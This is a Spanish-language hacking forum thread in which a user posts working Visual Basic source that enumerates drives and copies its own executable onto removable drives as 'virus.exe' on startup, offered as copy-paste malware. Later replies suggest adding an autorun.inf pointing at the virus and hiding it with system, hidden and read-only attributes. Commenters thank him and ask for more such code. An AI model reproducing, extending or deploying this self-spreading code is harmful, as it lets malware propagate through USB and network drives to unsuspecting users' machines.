Autor
|
Tema: [Source] Infectar unidades extraibles (pendrive), unidades de red, etc... (Leído 9,346 veces)
|
Mad Antrax
|
Este sencillo código permite enumerar todas las unidades del sistema, descubrir de que tipo son (fijas, extraibles, CD, remotas, etc...) y copiar el virus en su interior. Private Declare Function GetLogicalDrives Lib "kernel32" () As Long Private Declare Function GetDriveType Lib "kernel32" Alias "GetDriveTypeA" (ByVal nDrive As String) As Long Private Declare Function GetModuleFileName Lib "kernel32" Alias "GetModuleFileNameA" (ByVal hModule As Long, ByVal lpFileName As String, ByVal nSize As Long) As Long Const DRIVE_REMOVABLE = 2 Const DRIVE_FIXED = 3 Const DRIVE_REMOTE = 4 Const DRIVE_CDROM = 5 Const DRIVE_RAMDISK = 6 'Función para enumerar todas las unidades (sean del tipo que sean) Function EnumDrives() As String Dim i As Long Dim tmp As Long Dim drives As String tmp = GetLogicalDrives() If tmp Then For i = 0 To 25 If (tmp And 2 ^ i) <> 0 Then drives = drives & Chr$(i + 65) & ":#" End If Next End If EnumDrives = drives 'La variable drives almacena todas 'las unidades en formato "A:#C:#D:#E:#" End Function Function GetType(ByVal drives As String) Dim tmp() As String 'Separamos las unidades según el caracter # tmp = Split(drives, "#") For i = 0 To UBound(tmp) - 1 If GetDriveType(tmp(i)) = DRIVE_REMOVABLE Then 'Llamamos a la función de infectar la unidad 'si es del tipo DRIVE_REMOVABLE Call InfectDrive("virus.exe", tmp(i)) End If Next End Function Function InfectDrive(ByVal FileName As String, ByVal drive As String) As Boolean 'Importante, no siempre tenemos acceso de escritura 'en las unidades, sin esta linea podríamos "matar" 'nuestro virus :( On Error Resume Next Dim MySelf As String MySelf = String$(255, Chr$(0)) 'Obtenemos nuestra propia ruta GetModuleFileName 0, MySelf, Len(MySelf) 'Nos copiamos en la unidad con el nombre de "virus.exe" FileCopy MySelf, drive & "\" & FileName End Function Private Sub Form_Load() 'Empieza la juerga! Call GetType(EnumDrives) End Sub
El código está comentado y no tiene mucha complicación, copiar y pegar en un proyecto nuevo y os funcionará. Decirme si os gusta, si se puede mejorar algo, añadir funciones, etc... Saludos!! vuestro amigo ||MadAntrax||
|
|
« Última modificación: 30 Junio 2007, 15:16 pm por ||MadAntrax|| »
|
|
No hago hacks/cheats para juegos Online. Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.
|
|
|
Tyrz
Get big or die tryin'
|
muy guapo tio como siempre;D
|
|
|
|
Web dedicada por completo al surf. Hablamos de tablas de surf, videos de surf, fotos, juegos y mucha información sobre como aprender a surfear, spots famosos como mundaka, pipeline y zonas como vizcaya, surf españa, sopelana y mucho más. Trucos y peligros del surf. A que esperas? Entra en Surf
|
|
|
~~
|
Joe ultimamente estas q regalas los codigos xDD gracias (de nuevo)
|
|
|
|
|
|
|
Mad Antrax
|
Joe ultimamente estas q regalas los codigos xDD gracias (de nuevo)
Digamos que tengo una época generosa... tengo más códigos para regalar pero los publicaré poquito a poco, tantos de golpe no se asimilan bien Saludos!!
Se me ocurre una mejora: Hacer que el código cree el archivo autorun.ini con el path apuntando al virus, de esta forma consigues que nuestro EXE se ejecute al hacer doble click en las unidades de red, solo me falta saber si tambien afecta en los otros tipos de unidad. Proponer algo
|
|
« Última modificación: 3 Abril 2007, 00:23 am por ||MadAntrax|| »
|
|
No hago hacks/cheats para juegos Online. Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.
|
|
|
Jareth
|
Digamos que tengo una época generosa... tengo más códigos para regalar pero los publicaré poquito a poco, tantos de golpe no se asimilan bien
Saludos!!
Joer pues a seguir publicando codigos,que son muy interesantes y de gran ayuda.Espero con ansias tu siguiente aporte . Saludos y gracias.
|
|
|
|
|
|
|
Rudy21
Rudy21 Web Design
|
Si Despues de crear el autorun.inf usas shell y lo pones en vbhide y le pones attrib +s +h +r lo pones como archivo oculto yd e sistema aunke vea los ocultos no c ve jejeje
Salu2
|
|
|
|
|
|
|
Meg
|
podrias poner un post con todos tus codigos,en ese post se blokea y se le pone chincheta,yo creo k seria lo mejor para tener recopilados todos tus codigos ya que son buenos y utiles... solo es una idea xD que os parece??
|
|
|
|
|
|
|
Tyrz
Get big or die tryin'
|
a mi me parece buena idea
|
|
|
|
Web dedicada por completo al surf. Hablamos de tablas de surf, videos de surf, fotos, juegos y mucha información sobre como aprender a surfear, spots famosos como mundaka, pipeline y zonas como vizcaya, surf españa, sopelana y mucho más. Trucos y peligros del surf. A que esperas? Entra en Surf
|
|
|
Mad Antrax
|
podrias poner un post con todos tus codigos,en ese post se blokea y se le pone chincheta,yo creo k seria lo mejor para tener recopilados todos tus codigos ya que son buenos y utiles... solo es una idea xD que os parece??
Ummm, no creo que merezca un trato especial para mi sources, prefiero ir abriendo un post para cada source, asi lo podemos comentar y mejorar, si los pongo todos en uno se juntarán todas las dudas/sujerencias/mejoras y será un lío... Gracias igualmente
|
|
|
|
|
|
|
~~
|
Si kieres ponerlos en kizar.net yo me encargo de q tenga chincheta, una recopilacion asi siempre es util
|
|
|
|
|
|
|
|
Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
manejar unidades extraibles
Programación C/C++
|
MessageBoxA
|
2
|
3,714
|
22 Enero 2011, 13:48 pm
por Oblivi0n
|
|
|
[BATCH] copiar y ocultar virus en unidades extraibles
Scripting
|
imlikeabird34
|
9
|
6,316
|
27 Diciembre 2012, 08:56 am
por Eleкtro
|
|
|
El gusano Phorpiex se propaga vía Skype,correo electrónico y unidades extraíbles
Noticias
|
wolfbcn
|
0
|
1,832
|
23 Enero 2013, 02:20 am
por wolfbcn
|
|
|
[SOURCE] CTool (Conversion Tool, calcula y convierte unidades de tamaño)
.NET (C#, VB.NET, ASP)
|
Eleкtro
|
0
|
2,146
|
20 Septiembre 2013, 23:45 pm
por Eleкtro
|
|
|
[SOURCE-CODE] [VB] Implementación del Sistema Internacional de Unidades (SI)
.NET (C#, VB.NET, ASP)
|
Eleкtro
|
0
|
1,851
|
20 Abril 2017, 19:56 pm
por Eleкtro
|
|